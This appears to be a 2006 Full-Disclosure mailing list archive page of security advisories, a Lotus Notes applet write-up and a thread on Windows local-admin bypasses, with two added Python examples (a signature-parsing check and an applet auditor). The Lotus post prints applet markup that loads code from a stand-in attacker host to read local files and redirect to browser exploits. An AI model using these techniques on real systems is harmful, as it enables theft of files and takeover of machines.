[Full-disclosure] [CAID 34693, 34694]: CA BrightStor ARCserve Backup Multiple Buffer Overflow Vulnerabilities

2006-10-06 Thread Williams, James K

Title: CAID 34693, 34694: CA BrightStor ARCserve Backup Multiple 
Buffer Overflow Vulnerabilities

CA Vulnerability ID (CAID): 34693, 34694

CA Advisory Date: 2006-10-05

Discovered By: TippingPoint, www.zerodayinitiative.com

Impact: Remote attacker can execute arbitrary code.

Summary: CA BrightStor ARCserve Backup contains multiple buffer 
overflow conditions that allow remote attackers to execute 
arbitrary code with local SYSTEM privileges on Windows. These 
issues affect the BrightStor Backup Agent Service, the Job Engine 
Service, and the Discovery Service in multiple BrightStor ARCserve 
Backup application agents and the Base product.

Mitigating Factors: None

Severity: CA has given these vulnerabilities a High risk rating.

Affected Products:
BrightStor Products:
- BrightStor ARCserve Backup r11.5 SP1 and below (SP2 does not 
  have this vulnerability)
- BrightStor ARCserve Backup r11.1
- BrightStor ARCserve Backup for Windows r11
- BrightStor Enterprise Backup 10.5
- BrightStor ARCserve Backup v9.01   
CA Protection Suites r2:
- CA Server Protection Suite r2
- CA Business Protection Suite r2
- CA Business Protection Suite for Microsoft Small Business Server 
  Standard Edition r2
- CA Business Protection Suite for Microsoft Small Business Server 
  Premium Edition r2

Affected platforms:
Microsoft Windows

Status and Recommendation: 
Customers with vulnerable versions of the BrightStor ARCserve 
Backup products should upgrade to the latest versions which are 
available for download from http://supportconnect.ca.com.
Solution Document Reference APARs: 
QO82860, QO82863, QO82917, QO82856, QO82858

Determining if you are affected: 
For a list of updated files, and instructions on how to verify 
that the security update was fully applied, please review the 
Informational Solution referenced in the appropriate Solution 
Document.

References (URLs may wrap): 
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect Security Notice for this vulnerability:
Important Security Notice for BrightStor ARCserve Backup (Buffer 
Overrun)
http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp
Solution Document Reference APARs: 
QO82860, QO82863, QO82917, QO82856, QO82858
CA Security Advisor Research Blog posting:
http://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&pid=93686
CAID: 34693, 34694
CAID Advisory links: 
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34693
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34694
Discoverer: TippingPoint
http://www.tippingpoint.com/security/advisories/TSRT-06-11.html
http://www.tippingpoint.com/security/advisories/TSRT-06-12.html
http://www.zerodayinitiative.com/advisories/ZDI-06-030.html
http://www.zerodayinitiative.com/advisories/ZDI-06-031.html
CVE Reference: CVE-2006-5142, CVE-2006-5143
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143
OSVDB Reference: OSVDB ID: pending
http://osvdb.org/

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional information should contact CA 
Technical Support at http://supportconnect.ca.com.

For technical questions or comments related to this advisory,
please send email to [EMAIL PROTECTED], or contact me directly.

If you discover a vulnerability in CA products, please report
your findings to [EMAIL PROTECTED], or utilize our "Submit a 
Vulnerability" form.
URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx


Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, One CA Plaza. Islandia, NY 11749

Contact http://www3.ca.com/contact/
Legal Notice http://www3.ca.com/legal/
Privacy Policy http://www3.ca.com/privacy/
Copyright © 2006 CA. All rights reserved.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1192-1] New Mozilla packages fix several vulnerabilities

2006-10-06 Thread Martin Schulze

--------------------------------------------------------------------------
Debian Security Advisory DSA 1192-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
October 6th, 2006                       http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: mozilla
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs: CVE-2006-2788 CVE-2006-4340 CVE-2006-4565 CVE-2006-4566
 CVE-2006-4568 CVE-2006-4570 CVE-2006-4571
BugTraq ID : 20042

Several security related problems have been discovered in Mozilla and
derived products.  The Common Vulnerabilities and Exposures project
identifies the following vulnerabilities:

CVE-2006-2788

Fernando Ribeiro discovered that a vulnerability in the getRawDER
function allows remote attackers to cause a denial of service
(hang) and possibly execute arbitrary code.

CVE-2006-4340

Daniel Bleichenbacher recently described an implementation error
in RSA signature verification that causes the application to
incorrectly trust SSL certificates.

CVE-2006-4565, CVE-2006-4566

Priit Laes reported that a JavaScript regular expression can
trigger a heap-based buffer overflow which allows remote attackers
to cause a denial of service and possibly execute arbitrary code.

CVE-2006-4568

A vulnerability has been discovered that allows remote attackers
to bypass the security model and inject content into the sub-frame
of another site.

CVE-2006-4570

Georgi Guninski demonstrated that even with JavaScript disabled in
mail (the default) an attacker can still execute JavaScript when a
mail message is viewed, replied to, or forwarded.

CVE-2006-4571

Multiple unspecified vulnerabilities in Firefox, Thunderbird and
SeaMonkey allow remote attackers to cause a denial of service,
corrupt memory, and possibly execute arbitrary code.

For the stable distribution (sarge) these problems have been fixed in
version 1.7.8-1sarge7.3.1.

We recommend that you upgrade your Mozilla package.


Upgrade Instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------


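The CVE-2006-4340 entry above names a verification defect without showing it. As an added example (not code from the Debian advisory or from Mozilla/NSS), the two parsers below operate on the PKCS#1 v1.5 encoded block that RSA verification recovers, so no key is needed: a lenient parser that stops checking after the DigestInfo accepts a block padded out with garbage, while a strict parser rejects it. The helper names, the 128-byte block length and the sample vectors are constructed here.

```python
"""Strict vs. lenient PKCS#1 v1.5 signature-block parsing (SHA-1 DigestInfo)."""
import hashlib

# DER prefix of DigestInfo for SHA-1 (RFC 3447, section 9.2, note 1)
SHA1_DIGESTINFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")
DIGEST_LEN = 20
T_LEN = len(SHA1_DIGESTINFO_PREFIX) + DIGEST_LEN   # 35 bytes


def encode_pkcs1_v15(msg: bytes, em_len: int) -> bytes:
    """Build a correctly padded EMSA-PKCS1-v1_5 block: 00 01 FF..FF 00 T."""
    t = SHA1_DIGESTINFO_PREFIX + hashlib.sha1(msg).digest()
    if em_len < T_LEN + 11:
        raise ValueError("block too short for PKCS#1 v1.5 padding")
    return b"\x00\x01" + b"\xff" * (em_len - T_LEN - 3) + b"\x00" + t


def parse_lenient(em: bytes):
    """Defective parser: skips the FF padding, takes T from the bytes after
    the first 00 separator and never looks at what follows T."""
    if em[:2] != b"\x00\x01":
        return None
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i >= len(em) or em[i] != 0x00:
        return None
    body = em[i + 1:]
    if not body.startswith(SHA1_DIGESTINFO_PREFIX):
        return None
    start = len(SHA1_DIGESTINFO_PREFIX)
    return body[start:start + DIGEST_LEN]       # trailing bytes ignored


def parse_strict(em: bytes):
    """Correct parser: T must occupy the last T_LEN bytes, everything between
    the 00 01 header and the 00 separator must be FF, and at least eight
    padding bytes must be present."""
    if len(em) < T_LEN + 11 or em[:2] != b"\x00\x01":
        return None
    sep = len(em) - T_LEN - 1
    pad = em[2:sep]
    if len(pad) < 8 or any(b != 0xFF for b in pad) or em[sep] != 0x00:
        return None
    body = em[sep + 1:]
    if not body.startswith(SHA1_DIGESTINFO_PREFIX):
        return None
    return body[len(SHA1_DIGESTINFO_PREFIX):]


def verify(em: bytes, msg: bytes, parser) -> bool:
    """Compare the digest the parser extracted with the digest of msg."""
    digest = parser(em)
    return digest is not None and digest == hashlib.sha1(msg).digest()


# Constructed vectors for a 1024-bit modulus (128-byte block).
MSG = b"constructed sample message"
EM_LEN = 128
GOOD_EM = encode_pkcs1_v15(MSG, EM_LEN)
# Malformed block: minimum padding, a valid T, then filler up to EM_LEN.
# A verifier that does not check that T ends at the end of the block
# wrongly accepts blocks of this shape.
_t = SHA1_DIGESTINFO_PREFIX + hashlib.sha1(MSG).digest()
BAD_EM = b"\x00\x01" + b"\xff" * 8 + b"\x00" + _t
BAD_EM += bytes(range(EM_LEN - len(BAD_EM)))

if __name__ == "__main__":
    for name, parser in (("lenient", parse_lenient), ("strict", parse_strict)):
        print(name, "good:", verify(GOOD_EM, MSG, parser),
              "bad:", verify(BAD_EM, MSG, parser))
```
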
Re: [Full-disclosure] Removing the NIC cable = EoP?

2006-10-06 Thread [EMAIL PROTECTED]
*took out most of the text here*

As far as what this site is saying, it *CAN* work only if there is 
no security in place for the local box. And only on certain versions of 
98 if I remember correctly. However, win 98 is full of holes, so there 
is no need to attack it at layer 1.

   If the boxes are modern at all, they will run win xp or even better 
ubuntu or something of that sort. In XP mode, if they are using XP home 
and failed to set up an admin password, you can just go into safe mode as 
admin (no authentication required) and set up your local admin acct and 
go from there. XP pro won't let you do that. Ubuntu, well I'm not getting 
into that, but you can, and should, disable run level 1 at boot.

   Basically it boils down to this, could this have happened? Yes. If the 
admin has shit one clue could it happen? No. Start looking at layer 7 
again kids = /

Regards,
J



Re: [Full-disclosure] Removing the NIC cable = EoP?

2006-10-06 Thread Jessica Hope
Lee Turner is correct, a default RM machine running Windows 98 (or
95...) will allow local admin if it can't reach the network. Since
such machines would be deployed in schools and sometimes by people who
do not know anything about what they are doing, this attack can work
rather well.

However, RM's defaults are worse than that, as all restrictions are
stored in the registry, so you can just as quickly unrestrict yourself
with modification of a few keys...

Jessica



[Full-disclosure] JavaScript Spider (code that can traverse the web)

2006-10-06 Thread pdp (architect)
http://www.gnucitizen.org/projects/javascript-spider/

During the last couple of days I have been testing several attack
vectors to circumvent the browser security sandbox also known as the
same origin policy. There is a lot involved into this subject and I
will present my notes very soon.

The JavaScript Spider is the first implementation of a proof of
concept tool which shows that Javascript can be in fact quite
dangerous. This implementation depends on proxydrop.com but other
proxies are possible as well: Google Translate is one of them. Keep in
mind that the tool spiders only the first level.

The tool is located here:
http://www.gnucitizen.org/projects/javascript-spider/launch.htm

As you can see publicly available anonymizing proxies can be used to
fetch remote pages. This technique will work quite successfully on
Internet resources but not on Intranet. The reason for this is quite
obvious.

Suggestions and comments are greatly appreciated.

-- 
pdp (architect)
http://www.gnucitizen.org



[Full-disclosure] [USN-359-1] Python vulnerability

2006-10-06 Thread Martin Pitt
===========================================================
Ubuntu Security Notice USN-359-1                October 06, 2006
python2.3, python2.4 vulnerability
CVE-2006-4980
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  python2.3                       2.3.5-2ubuntu0.3
  python2.4-minimal               2.4.1-0ubuntu0.2

Ubuntu 5.10:
  python2.3                       2.3.5-8ubuntu0.2
  python2.4-minimal               2.4.2-1ubuntu0.2

Ubuntu 6.06 LTS:
  python2.3-dbg                   2.3.5-9ubuntu1.2
  python2.4-minimal               2.4.3-0ubuntu6

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Benjamin C. Wiley Sittler discovered that Python's repr() function did
not properly handle UTF-32/UCS-4 strings. If an application uses
repr() on arbitrary untrusted data, this could be exploited to execute
arbitrary code with the privileges of the python application.


Updated packages for Ubuntu 5.04:


[Full-disclosure] Details of Lotus Notes Java Applet vulnerabilities

2006-10-06 Thread Jouko Pynnonen
OVERVIEW
========

Lotus Notes is a groupware/e-mail system developed by Lotus Software.
Due to its security and collaboration features it's used particularly
by large organizations, government agencies, etc. IBM estimates it is
used by 60 million people.

Out of academic interest, I'm posting some technical details of three
old Lotus Notes 6.0x/6.5x vulnerabilities. IBM was notified during
July-August 2004 and a fix is available.



DETAILS
=======

The vulnerabilities involve Java applets embedded in HTML formatted
e-mail messages. A contributing factor in all of the issues is that
such Java applets are automatically displayed when the e-mail message
is viewed (unlike with most e-mail clients).



* Vulnerability 1: global file read access

An e-mail message containing a Java Applet with the codebase
"file:///" gains unlimited read access to local files when the e-mail
is viewed. An example HTML snippet follows:

  <applet codebase="file:///" archive="http://www.attacker.tld/applet.jar"
   width="1" height="1">

The applet's Java bytecode itself needn't be contained in the e-mail
but it's only referenced by the archive URL. The applet gets
automatically loaded when the e-mail is viewed. It has file read
access on the local system (can read whatever files the currently
logged in user can, and list hard drive contents). The applet can use
e.g. JavaScript to relay the files to the attacker.



* Vulnerability 2: launching web browser

A Java applet embedded in the same way can forcibly launch a web
browser with the desired URL when an e-mail message is viewed. An
example piece of Java code to do this follows:

  public void init() {
      getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html");
  }

Under default settings, Internet Explorer is launched and the attacker
supplied URL is opened in it when the e-mail message is viewed. This
exposes the system to Internet Explorer vulnerabilities, greatly
widening the attack surface.



* Vulnerability 3: codebase buffer overflow

Opening an HTML e-mail message which contains an applet tag with a
long codebase parameter (over 500 bytes) causes an apparently
stack-based buffer overflow condition. It may be exploitable to run
arbitrary code on the victim system when the e-mail message is viewed.
This is an example piece of HTML to produce it:

 

Exploitability of this scenario was NOT confirmed.



WORKAROUND
==========

Disabling Java applets can be used to protect from these
vulnerabilities. To disable Java applets, select File -> Preferences
-> User Preferences from the Notes client menu and uncheck the option
for "Enable Java applets."



SOLUTION
========

The issues have been addressed in Lotus Notes versions 6.5.4 and
6.0.5. For detailed fix information, see

http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&loc=en_US&cs=utf-8&cc=us&lang=en



CREDITS
=======

The vulnerability was discovered and researched by Jouko Pynnönen,
Klikki Oy, Finland.



-- 
Jouko Pynnonen <[EMAIL PROTECTED]>
Klikki Oy
http://iki.fi/jouko
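
The three patterns above are easy to screen for on the mail gateway. As an added example (not from the advisory or from IBM/Lotus code), the auditor below parses the HTML part of a message with the Python standard library and reports, per applet tag: the tag itself (Notes 6.0x/6.5x before the fix runs it on view), a codebase on the local file system, a remote archive combined with such a codebase, and a codebase over the 500 bytes the advisory names for the overflow. The sample bodies and the example.invalid host are constructed.

```python
"""Audit HTML mail bodies for the applet patterns in the Lotus Notes advisory."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

CODEBASE_LIMIT = 500   # advisory: "long codebase parameter (over 500 bytes)"


class AppletAuditor(HTMLParser):
    """Collect (code, detail) findings for every <applet> start tag."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "applet":          # HTMLParser lower-cases tag names
            return
        a = {k: (v or "") for k, v in attrs}
        codebase = a.get("codebase", "")
        archive = a.get("archive", "")
        # Any applet is worth reporting: the client auto-displays it on view.
        self.findings.append(("applet", "Java applet in mail body"))
        if urlsplit(codebase).scheme.lower() == "file":
            self.findings.append(
                ("file-codebase", "codebase %r grants local file access" % codebase))
            if archive:
                self.findings.append(
                    ("remote-archive", "archive %r loaded under a file: codebase" % archive))
        size = len(codebase.encode("utf-8"))
        if size > CODEBASE_LIMIT:
            self.findings.append(
                ("long-codebase", "codebase is %d bytes (limit %d)" % (size, CODEBASE_LIMIT)))


def audit_html_mail(body: str) -> list:
    """Return the list of (code, detail) findings for one HTML body."""
    auditor = AppletAuditor()
    auditor.feed(body)
    auditor.close()
    return auditor.findings


# Constructed sample bodies (example.invalid is a reserved, non-resolving host)
BENIGN = "<html><body><p>Monthly report attached.</p></body></html>"
FILE_READ = ('<html><body><applet codebase="file:///" '
             'archive="http://example.invalid/applet.jar" width="1" height="1">'
             '</applet></body></html>')
LONG_CODEBASE = ('<html><body><applet codebase="http://example.invalid/'
                 + "A" * 600 + '" width="1" height="1"></applet></body></html>')

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("file-read", FILE_READ),
                        ("long-codebase", LONG_CODEBASE)):
        print(label, [code for code, _ in audit_html_mail(body)])
```
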



[Full-disclosure] [ GLSA 200610-03 ] ncompress: Buffer Underflow

2006-10-06 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200610-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: ncompress: Buffer Underflow
      Date: October 06, 2006
      Bugs: #141728
        ID: 200610-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer underflow vulnerability has been reported in ncompress
allowing for the execution of arbitrary code.

Background
==========

ncompress is a suite of utilities to create and extract
Lempel-Ziv-Welch (LZW) compressed archives.

Affected packages
=================

    -------------------------------------------------------------------
     Package                      /  Vulnerable  /         Unaffected
    -------------------------------------------------------------------
  1  app-arch/ncompress               < 4.2.4.1              >= 4.2.4.1

Description
===========

Tavis Ormandy of the Google Security Team discovered a static buffer
underflow in ncompress.

Impact
======

An attacker could create a specially crafted LZW archive, that when
decompressed by a user or automated system would result in the
execution of arbitrary code with the permissions of the user invoking
the utility.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ncompress users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-arch/ncompress-4.2.4.1"

References
==========

  [ 1 ] CVE-2006-1168
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1168

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Re: [Full-disclosure] Removing the NIC cable = EoP?

2006-10-06 Thread James (njan) Eaton-Lee
Jessica Hope wrote:

> However, RM's defaults are worse than that, as all restrictions are
> stored in the registry, so you can just as quickly unrestrict yourself
> with modification of a few keys...

This is still specific to windows 98 - the registry is as secure a place 
as any in Windows 2000 and above to store configuration on a 
workstation, where the registry is protectable, and system settings such 
as these can be (and are) locked down by a complex set of ACLs.

Without administrator credentials (or privilege escalation, unrestricted 
physical access to the machine, etc), it isn't terribly feasible for 
users to arbitrarily write to protected registry keys in 2000 and above.

Windows 98 was never designed to be locked down, and all of these 
problems are stemming from the (possibly inadequate) methods taken to 
lock down the operating system and make it participate in a network or 
domain in a manner for which it was never really designed.

The newer versions of RM Connect, which is the package that this 
discussion is essentially about, are based on Active Directory with 
clients on the Windows 2000 and XP operating systems, and (as far as I'm 
aware) leverage the security mechanisms built into these platforms, with 
corresponding levels of security.

  - James.

-- 
   James (njan) Eaton-Lee | 10807960 | http://www.jeremiad.org
   Semper Monemus Sed Non Audiunt, Ergo Lartus - (Jean-Croix)

sites: https://www.bsrf.org.uk ~ http://www.security-forums.com
ca: https://www.cacert.org/index.php?id=3
-- 



[Full-disclosure] Kmail <= 1.9.1 (latest) DOS

2006-10-06 Thread nnp
Found this while fuzzing for a different type of vuln. For the life of
me I can't do anything useful with this bug so here it is. I don't have
the time to narrow down what causes the crash, if anyone manages to
get code execution from it, be a dear and let me know ;)

I am using KDE 3.5.2 and kmail 1.9.1.

This bug requires HTML to be enabled (Settings -> Configure Kmail ->
Security -> and tick Prefer HTML to Plain Text.).

(email that causes crash) http://silenthack.co.uk/nnp/exploits/kmail/crashMail

When the mail is viewed it should crash immediately and give you a
stack trace similar to

(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
[KCrash handler]
#6  0xe410 in __kernel_vsyscall ()
#7  0xb787b9a1 in raise () from /lib/tls/i686/cmov/libc.so.6
#8  0xb787d2b9 in abort () from /lib/tls/i686/cmov/libc.so.6
#9  0xb7757cf9 in kdbgstream::flush () from /usr/lib/libkdecore.so.4
#10 0xb7bf7cda in endl () from /usr/lib/libkmailprivate.so
#11 0xb5be724e in KIO::Scheduler::_scheduleJob () from /usr/lib/libkio.so.4
#12 0xb6cdaa17 in khtml_jpeg_source_mgr::khtml_jpeg_source_mgr ()
  from /usr/lib/libkhtml.so.4
#13 0xb6cdad1a in khtml_jpeg_source_mgr::khtml_jpeg_source_mgr ()
  from /usr/lib/libkhtml.so.4
#14 0xb7117eb9 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3
#15 0xb7118954 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3
#16 0xb74ad39e in QTimer::timeout () from /usr/lib/libqt-mt.so.3
#17 0xb713ceb1 in QTimer::event () from /usr/lib/libqt-mt.so.3
#18 0xb70ade56 in QApplication::internalNotify () from /usr/lib/libqt-mt.so.3
#19 0xb70ae052 in QApplication::notify () from /usr/lib/libqt-mt.so.3
#20 0xb77abd7d in KApplication::notify () from /usr/lib/libkdecore.so.4
#21 0xb703f157 in QApplication::sendEvent () from /usr/lib/libqt-mt.so.3
#22 0xb709f843 in QEventLoop::activateTimers () from /usr/lib/libqt-mt.so.3
#23 0xb7052f67 in QEventLoop::processEvents () from /usr/lib/libqt-mt.so.3
#24 0xb70c6947 in QEventLoop::enterLoop () from /usr/lib/libqt-mt.so.3
#25 0xb70c686a in QEventLoop::exec () from /usr/lib/libqt-mt.so.3
#26 0xb70ac965 in QApplication::exec () from /usr/lib/libqt-mt.so.3
#27 0x0804a04b in ?? ()
#28 0xbfe80938 in ?? ()
#29 0xbfe80b24 in ?? ()
#30 0x in ?? ()

-- 
http://silenthack.co.uk
http://smashthestack.org



Re: [Full-disclosure] Removing the NIC cable = EoP?

2006-10-06 Thread Greg


I don't really understand the fuss to be honest.

Eg, to do that you would have to be so lax in security that anyone who could
take an Ethernet cable out and put it in another computer would be able to
do that. This means that someone is bending over, unplugging, moving it the
required distance to another machine and plugging it in.

Hell, the well known and still existing Windows problem would be much
easier... you know the one yes? You have a networked machine that has a
password at keyboard level and a screen saver set to take it back to the
logon screen when inactive for "X" minutes. To get back in at keyboard level
for a non-hacker means knowing at least the password or possibly the
username and password depending on how it is set up. However, if the
keyboard user has already logged on then, say, gone to lunch and the machine
has defaulted to wanting you to logon, it retains its network capability.
Much easier for a pissed off employee to use that method to gain access than
being seen moving to that computer and back again. I have always maintained,
which some disagree with, that if the machine requires local user logon in
those circumstances, it also should be forced off the network. After all,
the machine that I discovered that had that problem was a payroll one and of
course anyone able to get in via the network could while normal users who
didn't know the password couldn't.

If anyone is interested, yes I sent that one in to MS quite some time back
just around when they released SP2 for XP. They said it would be an option
(you decide which way it behaves) next SP and/or Windows (eg, Vista). Don't
hold your breath on it happening.


> -Original Message-
> From: Jessica Hope [mailto:[EMAIL PROTECTED] 
> Sent: Friday, 6 October 2006 11:20 PM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Removing the NIC cable = EoP?
> 
> 
> Lee Turner is correct, a default RM machine running Windows 98 (or
> 95...) will allow local admin if it can't reach the network. 
> Since such machines would be deployed in schools and 
> sometimes by people who do not know anything about what they 
> are doing, this attack can work rather well.
> 
> However, RM's defaults are worse than that, as all 
> restrictions are stored in the registry, so you can just as 
> quickly unrestrict yourself with modification of a few keys...
> 
> Jessica
> 
> 
